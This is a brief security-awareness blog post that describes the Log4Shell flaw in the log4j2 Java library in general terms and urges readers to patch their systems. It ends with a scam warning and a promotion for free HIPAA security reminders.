Log4Shell hack

Log4Shell the simplest of hacks

The simplest of hacks...

Imagine being able to hack a server simply by pasting a block of text into a chat window. Well, that's exactly what happened to the game MineCraft's servers over the weekend. The newly discovered vulnerability is called Log4Shell and it exploits a previously unknown weakness is a common Java library used by thousands of servers around the world. The vulnerability allows an attacker to take complete control of the server using simple text inserted in a login field or other window, like a chat window.

Who's vulnerable? Twitter, iCloud, even certain Microsoft applications, just to name a few. The truth is, Java is one of the most prolific programming languages used on servers, particularly internet servers, so the potential reach of this vulnerability is almost incalculable - potentially every single company. So you have a vulnerability that impacts almost every server and you need no hacking skills to be able to exploit it. That's the reason why cybersecurity experts are sounding the alarm and many are calling this the most dangerous weakness we've seen in years.

What can you do about it? Application developers are actively issuing patches for this vulnerability. If you're hosting your own servers or running your own applications, it's a good idea to check if you are using log4j2. If you are, make sure you update the Java library immediately. For everyone else, make sure you run your updates this week - that includes checking the firmware on your firewalls and network switches. Virtually anything that has a log in process could be using this bit of Java code, and that means it needs to be updated.

For more information, read the details here: CVE - CVE-2021-44228 (mitre.org)

Stay on the lookout for holiday scams - fake delivery receipts are exceptionally popular right now, as are fake Amazon purchase emails.

HIPAA Security Reminders

 

HIPAA Security Suite has developed a weekly HIPAA Security Reminder series that’s FREE for all of us who are responsible for, or engaged in, the use and protection of PHI.

Pursuant to Section 164.308(a)(5) of the HIPAA Security Rule, the Standard states: Implement a security awareness and training program for all members of its workforce (including management).

This standard is part of our Best Practices Recommendations for HIPAA Security Suite users, but it’s available for FREE to anyone who wants to comply with HIPAA using the easiest, best tools available.

Sign Up

Exit mobile version